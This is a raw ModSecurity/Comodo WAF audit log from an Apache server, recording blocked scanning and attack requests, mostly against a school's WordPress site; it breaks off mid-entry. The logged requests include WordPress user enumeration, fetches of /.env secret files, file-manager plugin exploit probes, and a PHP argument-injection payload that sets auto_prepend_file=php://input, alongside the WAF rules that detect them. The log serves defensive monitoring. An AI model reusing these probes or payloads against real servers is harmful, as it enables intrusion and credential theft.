Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41f89838-Z-- --dfe1bc56-A-- [18/May/2025:21:43:19 +0700] aCnyB_ypzAd0elWOk7qvmAAAAAw 103.236.140.4 49916 103.236.140.4 8181 --dfe1bc56-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.78.211.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.78.211.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dfe1bc56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfe1bc56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747579399475195 2842 (- - -) Stopwatch2: 1747579399475195 2842; combined=1244, p1=428, p2=787, p3=0, p4=0, p5=29, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfe1bc56-Z-- --77739208-A-- [18/May/2025:21:46:46 +0700] aCny1vypzAd0elWOk7qvrAAAAAY 103.236.140.4 49960 103.236.140.4 8181 --77739208-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 138.68.82.23 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 138.68.82.23 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --77739208-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --77739208-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747579606328763 826 (- - -) Stopwatch2: 1747579606328763 826; combined=292, p1=258, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77739208-Z-- --01f30a16-A-- [18/May/2025:21:50:12 +0700] aCnzpFewLfDrCkDGIGzHKgAAANg 103.236.140.4 51942 103.236.140.4 8181 --01f30a16-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 105.27.194.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 105.27.194.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --01f30a16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01f30a16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747579812009726 2677 (- - -) Stopwatch2: 1747579812009726 2677; combined=1289, p1=407, p2=854, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01f30a16-Z-- --a8673935-A-- [18/May/2025:22:51:06 +0700] aCoB6hir-GlPrFVVKe69RgAAAFA 103.236.140.4 50808 103.236.140.4 8181 --a8673935-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.134.64.249 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.134.64.249 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --a8673935-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8673935-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747583466971932 763 (- - -) Stopwatch2: 1747583466971932 763; combined=289, p1=256, p2=0, p3=0, p4=0, p5=33, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8673935-Z-- --2a489d0e-A-- [18/May/2025:22:51:09 +0700] aCoB7VewLfDrCkDGIGzckQAAAM8 103.236.140.4 50872 103.236.140.4 8181 --2a489d0e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.134.64.249 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.134.64.249 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --2a489d0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a489d0e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747583469126687 818 (- - -) Stopwatch2: 1747583469126687 818; combined=347, p1=305, p2=0, p3=0, p4=0, p5=41, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a489d0e-Z-- --c92b8c40-A-- [18/May/2025:23:03:47 +0700] aCoE40PRqak7bVuUS6et7gAAAJU 103.236.140.4 43524 103.236.140.4 8181 --c92b8c40-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 117.241.172.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 117.241.172.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c92b8c40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c92b8c40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747584227258541 2649 (- - -) Stopwatch2: 1747584227258541 2649; combined=1300, p1=410, p2=849, p3=0, p4=0, p5=41, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c92b8c40-Z-- --a97b4c3c-A-- [18/May/2025:23:16:46 +0700] aCoH7hir-GlPrFVVKe7KowAAAE0 103.236.140.4 34646 103.236.140.4 8181 --a97b4c3c-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 146.235.35.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 146.235.35.96 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --a97b4c3c-C-- --a97b4c3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a97b4c3c-E-- --a97b4c3c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747585006180578 4625 (- - -) Stopwatch2: 1747585006180578 4625; combined=3251, p1=476, p2=2740, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a97b4c3c-Z-- --cb26d61b-A-- [18/May/2025:23:17:45 +0700] aCoIKUPRqak7bVuUS6e0CAAAAI0 103.236.140.4 35908 103.236.140.4 8181 --cb26d61b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.219.141.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.219.141.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cb26d61b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb26d61b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747585065025572 3466 (- - -) Stopwatch2: 1747585065025572 3466; combined=1505, p1=522, p2=953, p3=0, p4=0, p5=30, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb26d61b-Z-- --68ef0069-A-- [18/May/2025:23:17:58 +0700] aCoINhir-GlPrFVVKe7K8gAAAEU 103.236.140.4 36108 103.236.140.4 8181 --68ef0069-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.47.34.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.47.34.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --68ef0069-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68ef0069-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747585078146716 2824 (- - -) Stopwatch2: 1747585078146716 2824; combined=1305, p1=422, p2=851, p3=0, p4=0, p5=31, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68ef0069-Z-- --8df7962e-A-- [18/May/2025:23:19:21 +0700] aCoIifypzAd0elWOk7rWQgAAAAE 103.236.140.4 37656 103.236.140.4 8181 --8df7962e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8df7962e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8df7962e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747585161565372 3767 (- - -) Stopwatch2: 1747585161565372 3767; combined=2142, p1=615, p2=1491, p3=0, p4=0, p5=35, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8df7962e-Z-- --dc2e451a-A-- [18/May/2025:23:19:28 +0700] aCoIkBir-GlPrFVVKe7LTAAAAFA 103.236.140.4 37808 103.236.140.4 8181 --dc2e451a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.118 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dc2e451a-C-- demo.sayHello --dc2e451a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc2e451a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747585168346513 5666 (- - -) Stopwatch2: 1747585168346513 5666; combined=4205, p1=549, p2=3430, p3=31, p4=35, p5=94, sr=71, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc2e451a-Z-- --66870779-A-- [18/May/2025:23:25:56 +0700] aCoKFBir-GlPrFVVKe7NHAAAAE4 103.236.140.4 45706 103.236.140.4 8181 --66870779-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --66870779-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66870779-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747585556215391 1995 (- - -) Stopwatch2: 1747585556215391 1995; combined=1029, p1=319, p2=653, p3=0, p4=0, p5=57, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66870779-Z-- --42a7f70a-A-- [18/May/2025:23:26:04 +0700] aCoKHBir-GlPrFVVKe7NJwAAAFY 103.236.140.4 45884 103.236.140.4 8181 --42a7f70a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.74.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.74.179 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --42a7f70a-C-- demo.sayHello --42a7f70a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --42a7f70a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747585564615282 6180 (- - -) Stopwatch2: 1747585564615282 6180; combined=5009, p1=660, p2=4150, p3=36, p4=37, p5=76, sr=79, sw=50, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42a7f70a-Z-- --304d8f7e-A-- [18/May/2025:23:26:20 +0700] aCoKLBir-GlPrFVVKe7NSgAAAFE 103.236.140.4 46174 103.236.140.4 8181 --304d8f7e-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --304d8f7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --304d8f7e-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747585580706150 3096 (- - -) Stopwatch2: 1747585580706150 3096; combined=1805, p1=433, p2=1332, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --304d8f7e-Z-- --2b08550c-A-- [18/May/2025:23:26:20 +0700] aCoKLBir-GlPrFVVKe7NSwAAAEE 103.236.140.4 46176 103.236.140.4 8181 --2b08550c-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --2b08550c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b08550c-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747585580863332 2988 (- - -) Stopwatch2: 1747585580863332 2988; combined=1601, p1=404, p2=1167, p3=0, p4=0, p5=29, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b08550c-Z-- --4d62f103-A-- [18/May/2025:23:32:35 +0700] aCoLoxir-GlPrFVVKe7PKAAAAEQ 103.236.140.4 53708 103.236.140.4 8181 --4d62f103-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4d62f103-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d62f103-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747585955435389 2587 (- - -) Stopwatch2: 1747585955435389 2587; combined=1218, p1=410, p2=780, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d62f103-Z-- --f6a73e13-A-- [18/May/2025:23:32:43 +0700] aCoLq0PRqak7bVuUS6e5mwAAAI0 103.236.140.4 53868 103.236.140.4 8181 --f6a73e13-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.194.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.194.34 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f6a73e13-C-- demo.sayHello --f6a73e13-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6a73e13-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file 